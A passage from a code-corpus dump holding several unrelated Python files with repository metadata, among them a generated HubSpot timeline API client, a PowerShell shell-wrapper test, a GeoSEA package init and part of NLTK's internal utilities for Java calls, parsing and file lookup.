asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_with_http_info(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int app_id: The ID of the target app. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CollectionResponseTimelineEventTemplateNoPaging, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["app_id"]
all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method get_all" % key)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `get_all`") # noqa: E501
collection_formats = {}
path_params = {}
if "app_id" in local_var_params:
path_params["appId"] = local_var_params["app_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(["application/json", "*/*"]) # noqa: E501
# Authentication setting
auth_settings = ["developer_hapikey"] # noqa: E501
return self.api_client.call_api(
"/crm/v3/timeline/{appId}/event-templates",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CollectionResponseTimelineEventTemplateNoPaging", # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_by_id(self, event_template_id, app_id, **kwargs): # noqa: E501
"""Gets a specific event template for your app # noqa: E501
View the current state of a specific template and its tokens. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_by_id(event_template_id, app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TimelineEventTemplate
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_by_id_with_http_info(event_template_id, app_id, **kwargs) # noqa: E501
def get_by_id_with_http_info(self, event_template_id, app_id, **kwargs): # noqa: E501
"""Gets a specific event template for your app # noqa: E501
View the current state of a specific template and its tokens. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_by_id_with_http_info(event_template_id, app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TimelineEventTemplate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["event_template_id", "app_id"]
all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method get_by_id" % key)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'event_template_id' is set
if self.api_client.client_side_validation and ("event_template_id" not in local_var_params or local_var_params["event_template_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `event_template_id` when calling `get_by_id`") # noqa: E501
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `get_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if "event_template_id" in local_var_params:
path_params["eventTemplateId"] = local_var_params["event_template_id"] # noqa: E501
if "app_id" in local_var_params:
path_params["appId"] = local_var_params["app_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(["application/json", "*/*"]) # noqa: E501
# Authentication setting
auth_settings = ["developer_hapikey"] # noqa: E501
return self.api_client.call_api(
"/crm/v3/timeline/{appId}/event-templates/{eventTemplateId}",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="TimelineEventTemplate", # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def update(self, event_template_id, app_id, timeline_event_template_update_request, **kwargs): # noqa: E501
"""Update an existing event template # noqa: E501
Updates an existing template and its tokens. This is primarily used to update the headerTemplate/detailTemplate, and those changes will take effect for existing events. You can also update or replace all the tokens in the template here instead of doing individual API calls on the `/tokens` endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update(event_template_id, app_id, timeline_event_template_update_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param TimelineEventTemplateUpdateRequest timeline_event_template_update_request: The updated event template definition. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TimelineEventTemplate
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.update_with_http_info(event_template_id, app_id, timeline_event_template_update_request, **kwargs) # noqa: E501
def update_with_http_info(self, event_template_id, app_id, timeline_event_template_update_request, **kwargs): # noqa: E501
"""Update an existing event template # noqa: E501
Updates an existing template and its tokens. This is primarily used to update the headerTemplate/detailTemplate, and those changes will take effect for existing events. You can also update or replace all the tokens in the template here instead of doing individual API calls on the `/tokens` endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_with_http_info(event_template_id, app_id, timeline_event_template_update_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param TimelineEventTemplateUpdateRequest timeline_event_template_update_request: The updated event template definition. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TimelineEventTemplate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["event_template_id", "app_id", "timeline_event_template_update_request"]
all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method update" % key)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'event_template_id' is set
if self.api_client.client_side_validation and ("event_template_id" not in local_var_params or local_var_params["event_template_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `event_template_id` when calling `update`") # noqa: E501
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `update`") # noqa: E501
# verify the required parameter 'timeline_event_template_update_request' is set
if self.api_client.client_side_validation and (
"timeline_event_template_update_request" not in local_var_params or local_var_params["timeline_event_template_update_request"] is None # noqa: E501
): # noqa: E501
raise ApiValueError("Missing the required parameter `timeline_event_template_update_request` when calling `update`") # noqa: E501
collection_formats = {}
path_params = {}
if "event_template_id" in local_var_params:
path_params["eventTemplateId"] = local_var_params["event_template_id"] # noqa: E501
if "app_id" in local_var_params:
path_params["appId"] = local_var_params["app_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "timeline_event_template_update_request" in local_var_params:
body_params = local_var_params["timeline_event_template_update_request"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(["application/json", "*/*"]) # noqa: E501
# HTTP header `Content-Type`
header_params["Content-Type"] = self.api_client.select_header_content_type(["application/json"]) # noqa: E501 # noqa: E501
# Authentication setting
auth_settings = ["developer_hapikey"] # noqa: E501
return self.api_client.call_api(
"/crm/v3/timeline/{appId}/event-templates/{eventTemplateId}",
"PUT",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="TimelineEventTemplate", # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
| 55.049153 | 747 | 0.650451 |
14b13c907ee02797804ddb65081e1a4bf02dba2d | 1,774 | py | Python | tests/shells/test_powershell.py | WorkInProgress-Development/theplease | 9b9a2dcee3efa0e1b4f197fc55904c9327dc13ba | [
"MIT"
] | null | null | null | tests/shells/test_powershell.py | WorkInProgress-Development/theplease | 9b9a2dcee3efa0e1b4f197fc55904c9327dc13ba | [
"MIT"
] | null | null | null | tests/shells/test_powershell.py | WorkInProgress-Development/theplease | 9b9a2dcee3efa0e1b4f197fc55904c9327dc13ba | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
from theplease.shells import Powershell
@pytest.mark.usefixtures('isfile', 'no_memoize', 'no_cache')
class TestPowershell(object):
@pytest.fixture
def shell(self):
return Powershell()
@pytest.fixture(autouse=True)
def Popen(self, mocker):
mock = mocker.patch('theplease.shells.powershell.Popen')
return mock
def test_and_(self, shell):
assert shell.and_('ls', 'cd') == '(ls) -and (cd)'
def test_app_alias(self, shell):
assert 'function please' in shell.app_alias('please')
assert 'function FUCK' in shell.app_alias('FUCK')
assert 'theplease' in shell.app_alias('please')
def test_how_to_configure(self, shell):
assert not shell.how_to_configure().can_configure_automatically
@pytest.mark.parametrize('side_effect, expected_version, call_args', [
([b'''Major Minor Build Revision
----- ----- ----- --------
5 1 17763 316 \n'''], 'PowerShell 5.1.17763.316', ['powershell.exe']),
([IOError, b'PowerShell 6.1.2\n'], 'PowerShell 6.1.2', ['powershell.exe', 'pwsh'])])
def test_info(self, side_effect, expected_version, call_args, shell, Popen):
Popen.return_value.stdout.read.side_effect = side_effect
assert shell.info() == expected_version
assert Popen.call_count == len(call_args)
assert all([Popen.call_args_list[i][0][0][0] == call_arg for i, call_arg in enumerate(call_args)])
def test_get_version_error(self, shell, Popen):
Popen.return_value.stdout.read.side_effect = RuntimeError
with pytest.raises(RuntimeError):
shell._get_version()
assert Popen.call_args[0][0] == ['powershell.exe', '$PSVersionTable.PSVersion']
| 39.422222 | 106 | 0.654453 |
4a2de158668ee3ab72ff4d5e4bdba3f2f56c0583 | 251 | py | Python | cryptodataaccess/Calculator/CalculatorStore.py | athanikos/cryptodataaccess | 6189a44c65a9b03c02822a534e865740ab488809 | [
"MIT"
] | null | null | null | cryptodataaccess/Calculator/CalculatorStore.py | athanikos/cryptodataaccess | 6189a44c65a9b03c02822a534e865740ab488809 | [
"MIT"
] | null | null | null | cryptodataaccess/Calculator/CalculatorStore.py | athanikos/cryptodataaccess | 6189a44c65a9b03c02822a534e865740ab488809 | [
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
class CalculatorStore(metaclass=ABCMeta):
@abstractmethod
def insert_computed_notification(self):
pass
@abstractmethod
def fetch_computed_notification_before_date(self):
pass | 19.307692 | 54 | 0.74502 |
88405645b3c4eb2a5176688fb1fee78b388ba5f9 | 214 | py | Python | Clarinet/usermodel/IdealUser/__init__.py | rohans0509/Clarinet | 0a7a6a5e6a91f93956b6b5739cab1f030655cac8 | [
"MIT"
] | 1 | 2022-01-28T20:30:07.000Z | 2022-01-28T20:30:07.000Z | Clarinet/usermodel/IdealUser/__init__.py | rohans0509/Clarinet | 0a7a6a5e6a91f93956b6b5739cab1f030655cac8 | [
"MIT"
] | null | null | null | Clarinet/usermodel/IdealUser/__init__.py | rohans0509/Clarinet | 0a7a6a5e6a91f93956b6b5739cab1f030655cac8 | [
"MIT"
] | 2 | 2021-11-23T13:55:10.000Z | 2021-11-23T13:56:57.000Z | import miditoolkit
'''
==============
USE FUNCTION
==============
'''
def use(midi_file,*args,**kwargs):
channel=kwargs["channel"]
mido_obj = miditoolkit.midi.parser.MidiFile(midi_file)
return mido_obj | 19.454545 | 58 | 0.621495 |
1f3e92ae88c318db8d3e16174614a9de9c0873fd | 1,514 | py | Python | build/lib/geosea/__init__.py | py-geosea/geosea | c2bb56f72e2832098c910c57dbc6a935160c2cb4 | [
"MIT"
] | 1 | 2021-05-13T00:05:16.000Z | 2021-05-13T00:05:16.000Z | build/lib/geosea/__init__.py | py-geosea/geosea | c2bb56f72e2832098c910c57dbc6a935160c2cb4 | [
"MIT"
] | null | null | null | build/lib/geosea/__init__.py | py-geosea/geosea | c2bb56f72e2832098c910c57dbc6a935160c2cb4 | [
"MIT"
] | 1 | 2021-05-12T16:46:25.000Z | 2021-05-12T16:46:25.000Z | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Purpose: Convenience imports for geosea
# Author: Florian Petersen
# Katrin Hannemann
#
# GEOMAR Helmholtz Centre for Ocean Research Kiel, Germany
#
# Version: 1.21 August 2020
#
# -----------------------------------------------------------------------------
"""
GeoSEA: A Python Toolbox for seafloor geodesy
======================================================
GeoSEA is an open-source project to provide a pursuning Python tool for
seafloor gedetic data processing.
"""
from __future__ import absolute_import
import warnings
from .read import *
from .read_id import *
from .read_data import *
from .read_bsl import *
from .read_meta import *
from .read_tides import *
from .read_airpressure import *
from .proc_bsl import *
from .extract_df import *
from .search_df import *
from .create_df import *
from .range_sv import *
from .sw import *
from .replace import *
from .vert_bsl import *
from .hori_bsl import *
from .change2dateindex import *
from .change_dtype import *
from .compare_df import *
from .calc import *
global GMT_DATEFORMAT # Output date format
global IN_DATEFORMAT # Input date format
global PROJECTS # GeoSEA projects
GMT_DATEFORMAT = '%Y-%m-%dT%H:%M'
IN_DATEFORMAT = '%Y/%m/%d %H:%M:%S'
# MAR = MARSITE
# CHI = GeoSEA
# ETN = MARGOMET
PROJECTS = {'MAR' : '2014-11-16 00:00:00', 'CHI' : '2015-12-14 00:00:00', 'ETN' : '2016-04-15 00:00:00'}
| 23.65625 | 104 | 0.609643 |
9cd2adec526594135e46fdb123a072febd71c19f | 38,723 | py | Python | nltkma/internals.py | aydtmiri/nltk-ma | 5d7dd01844ee063fc910a648948624b6a2dddaf9 | [
"Apache-2.0"
] | null | null | null | nltkma/internals.py | aydtmiri/nltk-ma | 5d7dd01844ee063fc910a648948624b6a2dddaf9 | [
"Apache-2.0"
] | null | null | null | nltkma/internals.py | aydtmiri/nltk-ma | 5d7dd01844ee063fc910a648948624b6a2dddaf9 | [
"Apache-2.0"
] | null | null | null | # Natural Language Toolkit: Internal utility functions
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Steven Bird <stevenbird1@gmail.com>
# Edward Loper <edloper@gmail.com>
# Nitin Madnani <nmadnani@ets.org>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
import subprocess
import os
import fnmatch
import re
import warnings
import textwrap
import types
import sys
import stat
import locale
from xml.etree import ElementTree
##########################################################################
# Java Via Command-Line
##########################################################################
_java_bin = None
_java_options = []
# [xx] add classpath option to config_java?
def config_java(bin=None, options=None, verbose=False):
"""
Configure nltk's java interface, by letting nltk know where it can
find the Java binary, and what extra options (if any) should be
passed to Java when it is run.
:param bin: The full path to the Java binary. If not specified,
then nltk will search the system for a Java binary; and if
one is not found, it will raise a ``LookupError`` exception.
:type bin: str
:param options: A list of options that should be passed to the
Java binary when it is called. A common value is
``'-Xmx512m'``, which tells Java binary to increase
the maximum heap size to 512 megabytes. If no options are
specified, then do not modify the options list.
:type options: list(str)
"""
global _java_bin, _java_options
_java_bin = find_binary(
"java",
bin,
env_vars=["JAVAHOME", "JAVA_HOME"],
verbose=verbose,
binary_names=["java.exe"],
)
if options is not None:
if isinstance(options, str):
options = options.split()
_java_options = list(options)
def java(cmd, classpath=None, stdin=None, stdout=None, stderr=None, blocking=True):
"""
Execute the given java command, by opening a subprocess that calls
Java. If java has not yet been configured, it will be configured
by calling ``config_java()`` with no arguments.
:param cmd: The java command that should be called, formatted as
a list of strings. Typically, the first string will be the name
of the java class; and the remaining strings will be arguments
for that java class.
:type cmd: list(str)
:param classpath: A ``':'`` separated list of directories, JAR
archives, and ZIP archives to search for class files.
:type classpath: str
:param stdin, stdout, stderr: Specify the executed programs'
standard input, standard output and standard error file
handles, respectively. Valid values are ``subprocess.PIPE``,
an existing file descriptor (a positive integer), an existing
file object, 'pipe', 'stdout', 'devnull' and None. ``subprocess.PIPE`` indicates that a
new pipe to the child should be created. With None, no
redirection will occur; the child's file handles will be
inherited from the parent. Additionally, stderr can be
``subprocess.STDOUT``, which indicates that the stderr data
from the applications should be captured into the same file
handle as for stdout.
:param blocking: If ``false``, then return immediately after
spawning the subprocess. In this case, the return value is
the ``Popen`` object, and not a ``(stdout, stderr)`` tuple.
:return: If ``blocking=True``, then return a tuple ``(stdout,
stderr)``, containing the stdout and stderr outputs generated
by the java command if the ``stdout`` and ``stderr`` parameters
were set to ``subprocess.PIPE``; or None otherwise. If
``blocking=False``, then return a ``subprocess.Popen`` object.
:raise OSError: If the java command returns a nonzero return code.
"""
subprocess_output_dict = {
"pipe": subprocess.PIPE,
"stdout": subprocess.STDOUT,
"devnull": subprocess.DEVNULL,
}
stdin = subprocess_output_dict.get(stdin, stdin)
stdout = subprocess_output_dict.get(stdout, stdout)
stderr = subprocess_output_dict.get(stderr, stderr)
if isinstance(cmd, str):
raise TypeError("cmd should be a list of strings")
# Make sure we know where a java binary is.
if _java_bin is None:
config_java()
# Set up the classpath.
if isinstance(classpath, str):
classpaths = [classpath]
else:
classpaths = list(classpath)
classpath = os.path.pathsep.join(classpaths)
# Construct the full command string.
cmd = list(cmd)
cmd = ["-cp", classpath] + cmd
cmd = [_java_bin] + _java_options + cmd
# Call java via a subprocess
p = subprocess.Popen(cmd, stdin=stdin, stdout=stdout, stderr=stderr)
if not blocking:
return p
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print(_decode_stdoutdata(stderr))
raise OSError("Java command failed : " + str(cmd))
return (stdout, stderr)
if 0:
# config_java(options='-Xmx512m')
# Write:
# java('weka.classifiers.bayes.NaiveBayes',
# ['-d', '/tmp/names.model', '-t', '/tmp/train.arff'],
# classpath='/Users/edloper/Desktop/weka/weka.jar')
# Read:
(a, b) = java(
[
"weka.classifiers.bayes.NaiveBayes",
"-l",
"/tmp/names.model",
"-T",
"/tmp/test.arff",
"-p",
"0",
], # , '-distribution'],
classpath="/Users/edloper/Desktop/weka/weka.jar",
)
######################################################################
# Parsing
######################################################################
class ReadError(ValueError):
"""
Exception raised by read_* functions when they fail.
:param position: The index in the input string where an error occurred.
:param expected: What was expected when an error occurred.
"""
def __init__(self, expected, position):
ValueError.__init__(self, expected, position)
self.expected = expected
self.position = position
def __str__(self):
return "Expected %s at %s" % (self.expected, self.position)
_STRING_START_RE = re.compile(r"[uU]?[rR]?(\"\"\"|\'\'\'|\"|\')")
def read_str(s, start_position):
"""
If a Python string literal begins at the specified position in the
given string, then return a tuple ``(val, end_position)``
containing the value of the string literal and the position where
it ends. Otherwise, raise a ``ReadError``.
:param s: A string that will be checked to see if within which a
Python string literal exists.
:type s: str
:param start_position: The specified beginning position of the string ``s``
to begin regex matching.
:type start_position: int
:return: A tuple containing the matched string literal evaluated as a
string and the end position of the string literal.
:rtype: tuple(str, int)
:raise ReadError: If the ``_STRING_START_RE`` regex doesn't return a
match in ``s`` at ``start_position``, i.e., open quote. If the
``_STRING_END_RE`` regex doesn't return a match in ``s`` at the
end of the first match, i.e., close quote.
:raise ValueError: If an invalid string (i.e., contains an invalid
escape sequence) is passed into the ``eval``.
:Example:
>>> from nltkma.internals import read_str
>>> read_str('"Hello", World!', 0)
('Hello', 7)
"""
# Read the open quote, and any modifiers.
m = _STRING_START_RE.match(s, start_position)
if not m:
raise ReadError("open quote", start_position)
quotemark = m.group(1)
# Find the close quote.
_STRING_END_RE = re.compile(r"\\|%s" % quotemark)
position = m.end()
while True:
match = _STRING_END_RE.search(s, position)
if not match:
raise ReadError("close quote", position)
if match.group(0) == "\\":
position = match.end() + 1
else:
break
# Process it, using eval. Strings with invalid escape sequences
# might raise ValueEerror.
try:
return eval(s[start_position : match.end()]), match.end()
except ValueError as e:
raise ReadError("invalid string (%s)" % e) from e
_READ_INT_RE = re.compile(r"-?\d+")
def read_int(s, start_position):
"""
If an integer begins at the specified position in the given
string, then return a tuple ``(val, end_position)`` containing the
value of the integer and the position where it ends. Otherwise,
raise a ``ReadError``.
:param s: A string that will be checked to see if within which a
Python integer exists.
:type s: str
:param start_position: The specified beginning position of the string ``s``
to begin regex matching.
:type start_position: int
:return: A tuple containing the matched integer casted to an int,
and the end position of the int in ``s``.
:rtype: tuple(int, int)
:raise ReadError: If the ``_READ_INT_RE`` regex doesn't return a
match in ``s`` at ``start_position``.
:Example:
>>> from nltkma.internals import read_int
>>> read_int('42 is the answer', 0)
(42, 2)
"""
m = _READ_INT_RE.match(s, start_position)
if not m:
raise ReadError("integer", start_position)
return int(m.group()), m.end()
_READ_NUMBER_VALUE = re.compile(r"-?(\d*)([.]?\d*)?")
def read_number(s, start_position):
"""
If an integer or float begins at the specified position in the
given string, then return a tuple ``(val, end_position)``
containing the value of the number and the position where it ends.
Otherwise, raise a ``ReadError``.
:param s: A string that will be checked to see if within which a
Python number exists.
:type s: str
:param start_position: The specified beginning position of the string ``s``
to begin regex matching.
:type start_position: int
:return: A tuple containing the matched number casted to a ``float``,
and the end position of the number in ``s``.
:rtype: tuple(float, int)
:raise ReadError: If the ``_READ_NUMBER_VALUE`` regex doesn't return a
match in ``s`` at ``start_position``.
:Example:
>>> from nltkma.internals import read_number
>>> read_number('Pi is 3.14159', 6)
(3.14159, 13)
"""
m = _READ_NUMBER_VALUE.match(s, start_position)
if not m or not (m.group(1) or m.group(2)):
raise ReadError("number", start_position)
if m.group(2):
return float(m.group()), m.end()
else:
return int(m.group()), m.end()
######################################################################
# Check if a method has been overridden
######################################################################
def overridden(method):
"""
:return: True if ``method`` overrides some method with the same
name in a base class. This is typically used when defining
abstract base classes or interfaces, to allow subclasses to define
either of two related methods:
>>> class EaterI:
... '''Subclass must define eat() or batch_eat().'''
... def eat(self, food):
... if overridden(self.batch_eat):
... return self.batch_eat([food])[0]
... else:
... raise NotImplementedError()
... def batch_eat(self, foods):
... return [self.eat(food) for food in foods]
:type method: instance method
"""
if isinstance(method, types.MethodType) and method.__self__.__class__ is not None:
name = method.__name__
funcs = [
cls.__dict__[name]
for cls in _mro(method.__self__.__class__)
if name in cls.__dict__
]
return len(funcs) > 1
else:
raise TypeError("Expected an instance method.")
def _mro(cls):
"""
Return the method resolution order for ``cls`` -- i.e., a list
containing ``cls`` and all its base classes, in the order in which
they would be checked by ``getattr``. For new-style classes, this
is just cls.__mro__. For classic classes, this can be obtained by
a depth-first left-to-right traversal of ``__bases__``.
"""
if isinstance(cls, type):
return cls.__mro__
else:
mro = [cls]
for base in cls.__bases__:
mro.extend(_mro(base))
return mro
######################################################################
# Deprecation decorator & base class
######################################################################
# [xx] dedent msg first if it comes from a docstring.
def _add_epytext_field(obj, field, message):
"""Add an epytext @field to a given object's docstring."""
indent = ""
# If we already have a docstring, then add a blank line to separate
# it from the new field, and check its indentation.
if obj.__doc__:
obj.__doc__ = obj.__doc__.rstrip() + "\n\n"
indents = re.findall(r"(?<=\n)[ ]+(?!\s)", obj.__doc__.expandtabs())
if indents:
indent = min(indents)
# If we don't have a docstring, add an empty one.
else:
obj.__doc__ = ""
obj.__doc__ += textwrap.fill(
"@%s: %s" % (field, message),
initial_indent=indent,
subsequent_indent=indent + " ",
)
def deprecated(message):
"""
A decorator used to mark functions as deprecated. This will cause
a warning to be printed the when the function is used. Usage:
>>> from nltkma.internals import deprecated
>>> @deprecated('Use foo() instead')
... def bar(x):
... print(x/10)
"""
def decorator(func):
msg = "Function %s() has been deprecated. %s" % (func.__name__, message)
msg = "\n" + textwrap.fill(msg, initial_indent=" ", subsequent_indent=" ")
def newFunc(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
# Copy the old function's name, docstring, & dict
newFunc.__dict__.update(func.__dict__)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__deprecated__ = True
# Add a @deprecated field to the docstring.
_add_epytext_field(newFunc, "deprecated", message)
return newFunc
return decorator
class Deprecated:
"""
A base class used to mark deprecated classes. A typical usage is to
alert users that the name of a class has changed:
>>> from nltkma.internals import Deprecated
>>> class NewClassName:
... pass # All logic goes here.
...
>>> class OldClassName(Deprecated, NewClassName):
... "Use NewClassName instead."
The docstring of the deprecated class will be used in the
deprecation warning message.
"""
def __new__(cls, *args, **kwargs):
# Figure out which class is the deprecated one.
dep_cls = None
for base in _mro(cls):
if Deprecated in base.__bases__:
dep_cls = base
break
assert dep_cls, "Unable to determine which base is deprecated."
# Construct an appropriate warning.
doc = dep_cls.__doc__ or "".strip()
# If there's a @deprecated field, strip off the field marker.
doc = re.sub(r"\A\s*@deprecated:", r"", doc)
# Strip off any indentation.
doc = re.sub(r"(?m)^\s*", "", doc)
# Construct a 'name' string.
name = "Class %s" % dep_cls.__name__
if cls != dep_cls:
name += " (base class for %s)" % cls.__name__
# Put it all together.
msg = "%s has been deprecated. %s" % (name, doc)
# Wrap it.
msg = "\n" + textwrap.fill(msg, initial_indent=" ", subsequent_indent=" ")
warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
# Do the actual work of __new__.
return object.__new__(cls)
##########################################################################
# COUNTER, FOR UNIQUE NAMING
##########################################################################
class Counter:
"""
A counter that auto-increments each time its value is read.
"""
def __init__(self, initial_value=0):
self._value = initial_value
def get(self):
self._value += 1
return self._value
##########################################################################
# Search for files/binaries
##########################################################################
def find_file_iter(
filename,
env_vars=(),
searchpath=(),
file_names=None,
url=None,
verbose=False,
finding_dir=False,
):
"""
Search for a file to be used by nltk.
:param filename: The name or path of the file.
:param env_vars: A list of environment variable names to check.
:param file_names: A list of alternative file names to check.
:param searchpath: List of directories to search.
:param url: URL presented to user for download help.
:param verbose: Whether or not to print path when a file is found.
"""
file_names = [filename] + (file_names or [])
assert isinstance(filename, str)
assert not isinstance(file_names, str)
assert not isinstance(searchpath, str)
if isinstance(env_vars, str):
env_vars = env_vars.split()
yielded = False
# File exists, no magic
for alternative in file_names:
path_to_file = os.path.join(filename, alternative)
if os.path.isfile(path_to_file):
if verbose:
print("[Found %s: %s]" % (filename, path_to_file))
yielded = True
yield path_to_file
# Check the bare alternatives
if os.path.isfile(alternative):
if verbose:
print("[Found %s: %s]" % (filename, alternative))
yielded = True
yield alternative
# Check if the alternative is inside a 'file' directory
path_to_file = os.path.join(filename, "file", alternative)
if os.path.isfile(path_to_file):
if verbose:
print("[Found %s: %s]" % (filename, path_to_file))
yielded = True
yield path_to_file
# Check environment variables
for env_var in env_vars:
if env_var in os.environ:
if finding_dir: # This is to file a directory instead of file
yielded = True
yield os.environ[env_var]
for env_dir in os.environ[env_var].split(os.pathsep):
# Check if the environment variable contains a direct path to the bin
if os.path.isfile(env_dir):
if verbose:
print("[Found %s: %s]" % (filename, env_dir))
yielded = True
yield env_dir
# Check if the possible bin names exist inside the environment variable directories
for alternative in file_names:
path_to_file = os.path.join(env_dir, alternative)
if os.path.isfile(path_to_file):
if verbose:
print("[Found %s: %s]" % (filename, path_to_file))
yielded = True
yield path_to_file
# Check if the alternative is inside a 'file' directory
# path_to_file = os.path.join(env_dir, 'file', alternative)
# Check if the alternative is inside a 'bin' directory
path_to_file = os.path.join(env_dir, "bin", alternative)
if os.path.isfile(path_to_file):
if verbose:
print("[Found %s: %s]" % (filename, path_to_file))
yielded = True
yield path_to_file
# Check the path list.
for directory in searchpath:
for alternative in file_names:
path_to_file = os.path.join(directory, alternative)
if os.path.isfile(path_to_file):
yielded = True
yield path_to_file
# If we're on a POSIX system, then try using the 'which' command
# to find the file.
if os.name == "posix":
for alternative in file_names:
try:
p = subprocess.Popen(
["which", alternative],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = p.communicate()
path = _decode_stdoutdata(stdout).strip()
if path.endswith(alternative) and os.path.exists(path):
if verbose:
print("[Found %s: %s]" % (filename, path))
yielded = True
yield path
except (KeyboardInterrupt, SystemExit, OSError):
raise
finally:
pass
if not yielded:
msg = (
